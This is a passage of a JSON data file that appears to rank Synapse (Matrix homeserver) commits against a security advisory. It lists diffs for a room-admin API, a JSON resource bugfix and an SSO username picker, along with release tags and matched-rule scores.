"v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "COMMIT_IS_SECURITY_RELEVANT", - "message": "", - "relevance": 32 - }, - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8920, 8920", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: setting, request", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8920, 8846", - "relevance": 2 - } - ] - }, - { - "commit_id": "d781a81e692563c5785e3efd4aa2487696b9c995", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608305839, - "hunks": 8, - "message": "Allow server admin to get admin bit in rooms where local user is an admin (#8756) This adds an admin API that allows a server admin to get power in a room if a local user has power in a room. Will also invite the user if they're not in the room and its a private room. Can specify another user (rather than the admin user) to be granted power. Co-authored-by: Matthew Hodgson ", - "diff": [ - "diff --git a/changelog.d/8756.feature b/changelog.d/8756.feature", - "new file mode 100644", - "index 000000000..03eb79fb0", - "--- /dev/null", - "+++ b/changelog.d/8756.feature", - "@@ -0,0 +1 @@", - "+Add admin API that lets server admins get power in rooms in which local users have power.", - "diff --git a/synapse/rest/admin/__init__.py b/synapse/rest/admin/__init__.py", - "index 55ddebb4f..6f7dc0650 100644", - "--- a/synapse/rest/admin/__init__.py", - "+++ b/synapse/rest/admin/__init__.py", - "@@ -40,2 +40,3 @@ from synapse.rest.admin.rooms import (", - " ListRoomRestServlet,", - "+ MakeRoomAdminRestServlet,", - " RoomMembersRestServlet,", - "@@ -230,2 +231,3 @@ def register_servlets(hs, http_server):", - " PushersRestServlet(hs).register(http_server)", - "+ MakeRoomAdminRestServlet(hs).register(http_server)", - "diff --git a/synapse/rest/admin/rooms.py b/synapse/rest/admin/rooms.py", - "index b902af802..ab7cc9102 100644", - "--- a/synapse/rest/admin/rooms.py", - "+++ b/synapse/rest/admin/rooms.py", - "@@ -18,4 +18,4 @@ from typing import TYPE_CHECKING, List, Optional, Tuple", - "-from synapse.api.constants import EventTypes, JoinRules", - "-from synapse.api.errors import Codes, NotFoundError, SynapseError", - "+from synapse.api.constants import EventTypes, JoinRules, Membership", - "+from synapse.api.errors import AuthError, Codes, NotFoundError, SynapseError", - " from synapse.http.servlet import (", - "@@ -39,2 +39,3 @@ if TYPE_CHECKING:", - "+", - " logger = logging.getLogger(__name__)", - "@@ -369 +370,132 @@ class JoinRoomAliasServlet(RestServlet):", - " return 200, {\"room_id\": room_id}", - "+", - "+", - "+class MakeRoomAdminRestServlet(RestServlet):", - "+ \"\"\"Allows a server admin to get power in a room if a local user has power in", - "+ a room. Will also invite the user if they're not in the room and it's a", - "+ private room. Can specify another user (rather than the admin user) to be", - "+ granted power, e.g.:", - "+", - "+ POST/_synapse/admin/v1/rooms//make_room_admin", - "+ {", - "+ \"user_id\": \"@foo:example.com\"", - "+ }", - "+ \"\"\"", - "+", - "+ PATTERNS = admin_patterns(\"/rooms/(?P[^/]*)/make_room_admin\")", - "+", - "+ def __init__(self, hs: \"HomeServer\"):", - "+ self.hs = hs", - "+ self.auth = hs.get_auth()", - "+ self.room_member_handler = hs.get_room_member_handler()", - "+ self.event_creation_handler = hs.get_event_creation_handler()", - "+ self.state_handler = hs.get_state_handler()", - "+ self.is_mine_id = hs.is_mine_id", - "+", - "+ async def on_POST(self, request, room_identifier):", - "+ requester = await self.auth.get_user_by_req(request)", - "+ await assert_user_is_admin(self.auth, requester.user)", - "+ content = parse_json_object_from_request(request, allow_empty_body=True)", - "+", - "+ # Resolve to a room ID, if necessary.", - "+ if RoomID.is_valid(room_identifier):", - "+ room_id = room_identifier", - "+ elif RoomAlias.is_valid(room_identifier):", - "+ room_alias = RoomAlias.from_string(room_identifier)", - "+ room_id, _ = await self.room_member_handler.lookup_room_alias(room_alias)", - "+ room_id = room_id.to_string()", - "+ else:", - "+ raise SynapseError(", - "+ 400, \"%s was not legal room ID or room alias\" % (room_identifier,)", - "+ )", - "+", - "+ # Which user to grant room admin rights to.", - "+ user_to_add = content.get(\"user_id\", requester.user.to_string())", - "+", - "+ # Figure out which local users currently have power in the room, if any.", - "+ room_state = await self.state_handler.get_current_state(room_id)", - "+ if not room_state:", - "+ raise SynapseError(400, \"Server not in room\")", - "+", - "+ create_event = room_state[(EventTypes.Create, \"\")]", - "+ power_levels = room_state.get((EventTypes.PowerLevels, \"\"))", - "+", - "+ if power_levels is not None:", - "+ # We pick the local user with the highest power.", - "+ user_power = power_levels.content.get(\"users\", {})", - "+ admin_users = [", - "+ user_id for user_id in user_power if self.is_mine_id(user_id)", - "+ ]", - "+ admin_users.sort(key=lambda user: user_power[user])", - "+", - "+ if not admin_users:", - "+ raise SynapseError(400, \"No local admin user in room\")", - "+", - "+ admin_user_id = admin_users[-1]", - "+", - "+ pl_content = power_levels.content", - "+ else:", - "+ # If there is no power level events then the creator has rights.", - "+ pl_content = {}", - "+ admin_user_id = create_event.sender", - "+ if not self.is_mine_id(admin_user_id):", - "+ raise SynapseError(", - "+ 400, \"No local admin user in room\",", - "+ )", - "+", - "+ # Grant the user power equal to the room admin by attempting to send an", - "+ # updated power level event.", - "+ new_pl_content = dict(pl_content)", - "+ new_pl_content[\"users\"] = dict(pl_content.get(\"users\", {}))", - "+ new_pl_content[\"users\"][user_to_add] = new_pl_content[\"users\"][admin_user_id]", - "+", - "+ fake_requester = create_requester(", - "+ admin_user_id, authenticated_entity=requester.authenticated_entity,", - "+ )", - "+", - "+ try:", - "+ await self.event_creation_handler.create_and_send_nonmember_event(", - "+ fake_requester,", - "+ event_dict={", - "+ \"content\": new_pl_content,", - "+ \"sender\": admin_user_id,", - "+ \"type\": EventTypes.PowerLevels,", - "+ \"state_key\": \"\",", - "+ \"room_id\": room_id,", - "+ },", - "+ )", - "+ except AuthError:", - "+ # The admin user we found turned out not to have enough power.", - "+ raise SynapseError(", - "+ 400, \"No local admin user in room with power to update power levels.\"", - "+ )", - "+", - "+ # Now we check if the user we're granting admin rights to is already in", - "+ # the room. If not and it's not a public room we invite them.", - "+ member_event = room_state.get((EventTypes.Member, user_to_add))", - "+ is_joined = False", - "+ if member_event:", - "+ is_joined = member_event.content[\"membership\"] in (", - "+ Membership.JOIN,", - "+ Membership.INVITE,", - "+ )", - "+", - "+ if is_joined:", - "+ return 200, {}", - "+", - "+ join_rules = room_state.get((EventTypes.JoinRules, \"\"))", - "+ is_public = False", - "+ if join_rules:", - "+ is_public = join_rules.content.get(\"join_rule\") == JoinRules.PUBLIC", - "+", - "+ if is_public:", - "+ return 200, {}", - "+", - "+ await self.room_member_handler.update_membership(", - "+ fake_requester,", - "+ target=UserID.from_string(user_to_add),", - "+ room_id=room_id,", - "+ action=Membership.INVITE,", - "+ )", - "+", - "+ return 200, {}", - "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", - "index 014c30287..60a5fcecf 100644", - "--- a/tests/rest/admin/test_room.py", - "+++ b/tests/rest/admin/test_room.py", - "@@ -22,2 +22,3 @@ from mock import Mock", - " import synapse.rest.admin", - "+from synapse.api.constants import EventTypes, Membership", - " from synapse.api.errors import Codes", - "@@ -1434,2 +1435,139 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "+class MakeRoomAdminTestCase(unittest.HomeserverTestCase):", - "+ servlets = [", - "+ synapse.rest.admin.register_servlets,", - "+ room.register_servlets,", - "+ login.register_servlets,", - "+ ]", - "+", - "+ def prepare(self, reactor, clock, homeserver):", - "+ self.admin_user = self.register_user(\"admin\", \"pass\", admin=True)", - "+ self.admin_user_tok = self.login(\"admin\", \"pass\")", - "+", - "+ self.creator = self.register_user(\"creator\", \"test\")", - "+ self.creator_tok = self.login(\"creator\", \"test\")", - "+", - "+ self.second_user_id = self.register_user(\"second\", \"test\")", - "+ self.second_tok = self.login(\"second\", \"test\")", - "+", - "+ self.public_room_id = self.helper.create_room_as(", - "+ self.creator, tok=self.creator_tok, is_public=True", - "+ )", - "+ self.url = \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(", - "+ self.public_room_id", - "+ )", - "+", - "+ def test_public_room(self):", - "+ \"\"\"Test that getting admin in a public room works.", - "+ \"\"\"", - "+ room_id = self.helper.create_room_as(", - "+ self.creator, tok=self.creator_tok, is_public=True", - "+ )", - "+", - "+ channel = self.make_request(", - "+ \"POST\",", - "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", - "+ content={},", - "+ access_token=self.admin_user_tok,", - "+ )", - "+", - "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "+", - "+ # Now we test that we can join the room and ban a user.", - "+ self.helper.join(room_id, self.admin_user, tok=self.admin_user_tok)", - "+ self.helper.change_membership(", - "+ room_id,", - "+ self.admin_user,", - "+ \"@test:test\",", - "+ Membership.BAN,", - "+ tok=self.admin_user_tok,", - "+ )", - "+", - "+ def test_private_room(self):", - "+ \"\"\"Test that getting admin in a private room works and we get invited.", - "+ \"\"\"", - "+ room_id = self.helper.create_room_as(", - "+ self.creator, tok=self.creator_tok, is_public=False,", - "+ )", - "+", - "+ channel = self.make_request(", - "+ \"POST\",", - "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", - "+ content={},", - "+ access_token=self.admin_user_tok,", - "+ )", - "+", - "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "+", - "+ # Now we test that we can join the room (we should have received an", - "+ # invite) and can ban a user.", - "+ self.helper.join(room_id, self.admin_user, tok=self.admin_user_tok)", - "+ self.helper.change_membership(", - "+ room_id,", - "+ self.admin_user,", - "+ \"@test:test\",", - "+ Membership.BAN,", - "+ tok=self.admin_user_tok,", - "+ )", - "+", - "+ def test_other_user(self):", - "+ \"\"\"Test that giving admin in a public room works to a non-admin user works.", - "+ \"\"\"", - "+ room_id = self.helper.create_room_as(", - "+ self.creator, tok=self.creator_tok, is_public=True", - "+ )", - "+", - "+ channel = self.make_request(", - "+ \"POST\",", - "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", - "+ content={\"user_id\": self.second_user_id},", - "+ access_token=self.admin_user_tok,", - "+ )", - "+", - "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "+", - "+ # Now we test that we can join the room and ban a user.", - "+ self.helper.join(room_id, self.second_user_id, tok=self.second_tok)", - "+ self.helper.change_membership(", - "+ room_id,", - "+ self.second_user_id,", - "+ \"@test:test\",", - "+ Membership.BAN,", - "+ tok=self.second_tok,", - "+ )", - "+", - "+ def test_not_enough_power(self):", - "+ \"\"\"Test that we get a sensible error if there are no local room admins.", - "+ \"\"\"", - "+ room_id = self.helper.create_room_as(", - "+ self.creator, tok=self.creator_tok, is_public=True", - "+ )", - "+", - "+ # The creator drops admin rights in the room.", - "+ pl = self.helper.get_state(", - "+ room_id, EventTypes.PowerLevels, tok=self.creator_tok", - "+ )", - "+ pl[\"users\"][self.creator] = 0", - "+ self.helper.send_state(", - "+ room_id, EventTypes.PowerLevels, body=pl, tok=self.creator_tok", - "+ )", - "+", - "+ channel = self.make_request(", - "+ \"POST\",", - "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", - "+ content={},", - "+ access_token=self.admin_user_tok,", - "+ )", - "+", - "+ # We expect this to fail with a 400 as there are no room admins.", - "+ #", - "+ # (Note we assert the error message to ensure that it's not denied for", - "+ # some other reason)", - "+ self.assertEqual(400, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "+ self.assertEqual(", - "+ channel.json_body[\"error\"],", - "+ \"No local admin user in room with power to update power levels.\",", - "+ )", - "+", - "+", - " PURGE_TABLES = [" - ], - "changed_files": [ - "changelog.d/8756.feature", - "synapse/rest/admin/__init__.py", - "synapse/rest/admin/rooms.py", - "tests/rest/admin/test_room.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8756": "admin-api: Don't Allow Admins to Invite Themselves Into Private Rooms #9027" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "COMMIT_IS_SECURITY_RELEVANT", - "message": "", - "relevance": 32 - }, - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8756, 8756", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: server", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8756", - "relevance": 2 - } - ] - }, - { - "commit_id": "1821f7cc265ab01cfee4055cfddb90563b61ce5b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607604175, - "hunks": 3, - "message": "Fix buglet in DirectRenderJsonResource (#8897) this was using `canonical_json` without setting it, so when you used it as a standalone class, you would get exceptions.", - "diff": [ - "diff --git a/changelog.d/8897.feature b/changelog.d/8897.feature", - "new file mode 100644", - "index 000000000..d450ef499", - "--- /dev/null", - "+++ b/changelog.d/8897.feature", - "@@ -0,0 +1 @@", - "+Add support for allowing users to pick their own user ID during a single-sign-on login.", - "diff --git a/synapse/http/server.py b/synapse/http/server.py", - "index 6a4e429a6..e464bfe6c 100644", - "--- a/synapse/http/server.py", - "+++ b/synapse/http/server.py", - "@@ -277,2 +277,6 @@ class DirectServeJsonResource(_AsyncResource):", - "+ def __init__(self, canonical_json=False, extract_context=False):", - "+ super().__init__(extract_context)", - "+ self.canonical_json = canonical_json", - "+", - " def _send_response(", - "@@ -320,5 +324,3 @@ class JsonResource(DirectServeJsonResource):", - " def __init__(self, hs, canonical_json=True, extract_context=False):", - "- super().__init__(extract_context)", - "-", - "- self.canonical_json = canonical_json", - "+ super().__init__(canonical_json, extract_context)", - " self.clock = hs.get_clock()" - ], - "changed_files": [ - "changelog.d/8897.feature", - "synapse/http/server.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8897": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8897, 8897", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: setting, resource", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: server", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8897", - "relevance": 2 - } - ] - }, - { - "commit_id": "28877fade90a5cfb3457c9e6c70924dbbe8af715", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608301186, - "hunks": 43, - "message": "Implement a username picker for synapse (#8942) The final part (for now) of my work to implement a username picker in synapse itself. The idea is that we allow `UsernameMappingProvider`s to return `localpart=None`, in which case, rather than redirecting the browser back to the client, we redirect to a username-picker resource, which allows the user to enter a username. We *then* complete the SSO flow (including doing the client permission checks). The static resources for the username picker itself (in https://github.com/matrix-org/synapse/tree/rav/username_picker/synapse/res/username_picker) are essentially lifted wholesale from https://github.com/matrix-org/matrix-synapse-saml-mozilla/tree/master/matrix_synapse_saml_mozilla/res. As the comment says, we might want to think about making them customisable, but that can be a follow-up. Fixes #8876.", - "diff": [ - "diff --git a/changelog.d/8942.feature b/changelog.d/8942.feature", - "new file mode 100644", - "index 000000000..d450ef499", - "--- /dev/null", - "+++ b/changelog.d/8942.feature", - "@@ -0,0 +1 @@", - "+Add support for allowing users to pick their own user ID during a single-sign-on login.", - "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", - "index 549c581a9..077cb619c 100644", - "--- a/docs/sample_config.yaml", - "+++ b/docs/sample_config.yaml", - "@@ -1827,5 +1827,6 @@ oidc_config:", - " #", - "- # This must be configured if using the default mapping provider.", - "+ # If this is not set, the user will be prompted to choose their", - "+ # own username.", - " #", - "- localpart_template: \"{{ user.preferred_username }}\"", - "+ #localpart_template: \"{{ user.preferred_username }}\"", - "diff --git a/synapse/app/homeserver.py b/synapse/app/homeserver.py", - "index bbb740783..8d9b53be5 100644", - "--- a/synapse/app/homeserver.py", - "+++ b/synapse/app/homeserver.py", - "@@ -65,2 +65,3 @@ from synapse.rest.health import HealthResource", - " from synapse.rest.key.v2 import KeyApiV2Resource", - "+from synapse.rest.synapse.client.pick_username import pick_username_resource", - " from synapse.rest.well_known import WellKnownResource", - "@@ -194,2 +195,3 @@ class SynapseHomeServer(HomeServer):", - " \"/_synapse/admin\": AdminRestResource(self),", - "+ \"/_synapse/client/pick_username\": pick_username_resource(self),", - " }", - "diff --git a/synapse/config/oidc_config.py b/synapse/config/oidc_config.py", - "index 1abf8ed40..4e3055282 100644", - "--- a/synapse/config/oidc_config.py", - "+++ b/synapse/config/oidc_config.py", - "@@ -205,5 +205,6 @@ class OIDCConfig(Config):", - " #", - "- # This must be configured if using the default mapping provider.", - "+ # If this is not set, the user will be prompted to choose their", - "+ # own username.", - " #", - "- localpart_template: \"{{{{ user.preferred_username }}}}\"", - "+ #localpart_template: \"{{{{ user.preferred_username }}}}\"", - "diff --git a/synapse/handlers/oidc_handler.py b/synapse/handlers/oidc_handler.py", - "index cbd11a138..709f8dfc1 100644", - "--- a/synapse/handlers/oidc_handler.py", - "+++ b/synapse/handlers/oidc_handler.py", - "@@ -949,3 +949,3 @@ class OidcHandler(BaseHandler):", - " UserAttributeDict = TypedDict(", - "- \"UserAttributeDict\", {\"localpart\": str, \"display_name\": Optional[str]}", - "+ \"UserAttributeDict\", {\"localpart\": Optional[str], \"display_name\": Optional[str]}", - " )", - "@@ -1030,6 +1030,6 @@ env = Environment(finalize=jinja_finalize)", - " class JinjaOidcMappingConfig:", - "- subject_claim = attr.ib() # type: str", - "- localpart_template = attr.ib() # type: Template", - "- display_name_template = attr.ib() # type: Optional[Template]", - "- extra_attributes = attr.ib() # type: Dict[str, Template]", - "+ subject_claim = attr.ib(type=str)", - "+ localpart_template = attr.ib(type=Optional[Template])", - "+ display_name_template = attr.ib(type=Optional[Template])", - "+ extra_attributes = attr.ib(type=Dict[str, Template])", - "@@ -1049,14 +1049,10 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", - "- if \"localpart_template\" not in config:", - "- raise ConfigError(", - "- \"missing key: oidc_config.user_mapping_provider.config.localpart_template\"", - "- )", - "-", - "- try:", - "- localpart_template = env.from_string(config[\"localpart_template\"])", - "- except Exception as e:", - "- raise ConfigError(", - "- \"invalid jinja template for oidc_config.user_mapping_provider.config.localpart_template: %r\"", - "- % (e,)", - "- )", - "+ localpart_template = None # type: Optional[Template]", - "+ if \"localpart_template\" in config:", - "+ try:", - "+ localpart_template = env.from_string(config[\"localpart_template\"])", - "+ except Exception as e:", - "+ raise ConfigError(", - "+ \"invalid jinja template\", path=[\"localpart_template\"]", - "+ ) from e", - "@@ -1068,5 +1064,4 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", - " raise ConfigError(", - "- \"invalid jinja template for oidc_config.user_mapping_provider.config.display_name_template: %r\"", - "- % (e,)", - "- )", - "+ \"invalid jinja template\", path=[\"display_name_template\"]", - "+ ) from e", - "@@ -1076,5 +1071,3 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", - " if not isinstance(extra_attributes_config, dict):", - "- raise ConfigError(", - "- \"oidc_config.user_mapping_provider.config.extra_attributes must be a dict\"", - "- )", - "+ raise ConfigError(\"must be a dict\", path=[\"extra_attributes\"])", - "@@ -1085,5 +1078,4 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", - " raise ConfigError(", - "- \"invalid jinja template for 